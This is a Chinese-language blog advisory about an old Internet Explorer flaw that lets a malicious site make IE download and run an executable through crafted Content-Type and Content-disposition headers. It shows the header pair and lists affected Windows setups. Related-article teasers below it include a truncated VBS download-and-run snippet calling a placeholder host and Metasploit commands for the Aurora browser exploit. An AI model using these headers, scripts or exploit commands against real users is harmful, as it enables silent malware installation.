IE自动下载程序并运行的漏洞

原创 2007年10月05日 11:20:00

涉及程序: IE 6,IE 5.01 SP2


详细:
在IE中存在一个漏洞,如果攻击者利用此漏洞建立一个恶意的站点,当用户使 用IE浏览这个站点时,在好几种情况下恶意的攻击程序就会自动

下载到用户系统上并运行。如当用户浏览的内容中含有以下的HTTP应答报头时,就会发生:

Content-Type: audio/x-ms-wma
Content-disposition: inline; filename="foo.exe"
以上描述仅仅是一个实例,使用其它的Content-Type报头,像audio/midi,也存在同样的问题。
这个漏洞在以下情况受影响(在SNS以前的公告中说仅仅 IE 6 受此漏洞的影响 ,但是现在被进一步证实IE 5.01 SP2 也有这样的漏洞):

(1) Windows NT 4.0 Workstation + SP6a + IE 6 + all available fixes [Japanese version]
(2) Windows NT 4.0 Workstation + SP6a + Windows Media Player 6.4 + IE 6 + all available fixes [Japanese version]
(3) Windows 2000 Professional + SP2 + SRP1 + Windows Media Player 6.4 + IE 6 + all available fixes [Japanese version]
(4) Windows 2000 Professional + SP2 + SRP1 + Windows Media Player 6.4 + IE 5.01 SP2 + all available fixes [Japanese version]
(5) Windows 98 + Windows 98 System Update + Windows Media Player 6.4 + IE 6 + all available fixes [Japanese version]
(6) Windows 2000 Professional + SP2 + SRP1 + Windows Media Player 7.1 + IE 6 + Office 2000 SR-1 + all available fixes

[Japanese version]

注意: Windows Media Player 6.4 在 Windows 2000 和 Windows 98中是被默认安装的.


解决方案:
下载补丁:
http://www.microsoft.com/windows/ie/downloads/critical/Q321232/default.asp 

服务器返回JSON,IE出现下载问题

我向来的观点,IE就是个奇葩。服务器返回json,chrome处理得好地地,但IE却奇葩地向你请求是否要保存这个JSON文件?之所以出现这种弱智现象,是因为IE无法识别一个所谓的响应头部:applic...
  • leftfist
  • leftfist
  • 2017年03月14日 17:50
  • 793

Active X控件在IE上自动下载并注册

Active X控件在调用证书时是非常常见的。为了方便不懂计算机的人更好的操作,我们经常将Actvice X控件嵌入到项目中,使其项目运行时自动检测是否有该控件,如没有,则进行下载和注册。...
  • Aleyns
  • Aleyns
  • 2017年09月19日 10:14
  • 590

自动下载并运行的VBS脚本代码

自动下载并运行的VBS脚本代码 Set xPost = createObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.xx.com/dc...
  • yatere
  • yatere
  • 2011年06月23日 09:58
  • 4298

【技术分享】 ​IE浏览器漏洞利用技术的演变 ( 一 )

作者:hac425 稿费:500RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 IE浏览器漏洞利用技术的演变 ...
  • qq_27446553
  • qq_27446553
  • 2016年09月13日 08:17
  • 541

​IE浏览器漏洞利用技术的演变 ( 一 )

之前渣到爆的IE现在和小娜娜在一起,加了剪辑功能我都要把原来自带的截图工具废弃了,还是很好用的嘛  IE浏览器漏洞利用技术的演变 注:文章中涉及的软件,或dll, 即最终的 e...
  • SAKAISON
  • SAKAISON
  • 2016年09月12日 16:13
  • 1445

metasploit对IE浏览器的极光漏洞进行渗透利用

msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/meterp...
  • feier7501
  • feier7501
  • 2013年05月12日 17:25
  • 3083

如何解决IE会自动下载返回的JSON数据

 JQuery的post方法: dataType 可选。规定预期的服务器响应的数据类型。 默认执行智能判断(xml、json、script 或 html)。 JQuery会根据Resp...
  • fengzhihen2007
  • fengzhihen2007
  • 2016年08月20日 12:09
  • 1555

IE UAF 漏洞(CVE-2012-4969)漏洞分析与利用

简介 这是一个UAF的漏洞 实验环境 Windows 7 Sp1 32位 IE 8 windbg IDA mona 漏洞分析 搜了一下metasploit...
  • u012763794
  • u012763794
  • 2017年04月05日 11:35
  • 2560

CVE-2012-1876浅析-Internet Explorer堆溢出漏洞

本文转载自 WinDbg漏洞分析调试(一) WinDbg漏洞分析调试(二)引子最近开始要在部门内进行WinDbg漏洞分析方面的专题showcase,打算将每次分享的内容整理成文章,希望能写一个系列...
  • qq_32400847
  • qq_32400847
  • 2017年08月13日 12:01
  • 479

网站被黑,打开网页自动下载文件

今天上班,来了个电话,接起来之后,客户说网站被黑了。一打开网页,就下载文件。 于是我打开客户说的网页,试了下,还真是自动下载了1个 1.exe 文件。 查看源代码,发现最上面一行, 有   这个...
  • csdn_xhl868
  • csdn_xhl868
  • 2015年03月09日 12:52
  • 1463
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:IE自动下载程序并运行的漏洞
举报原因:
原因补充:

(最多只允许输入30个字)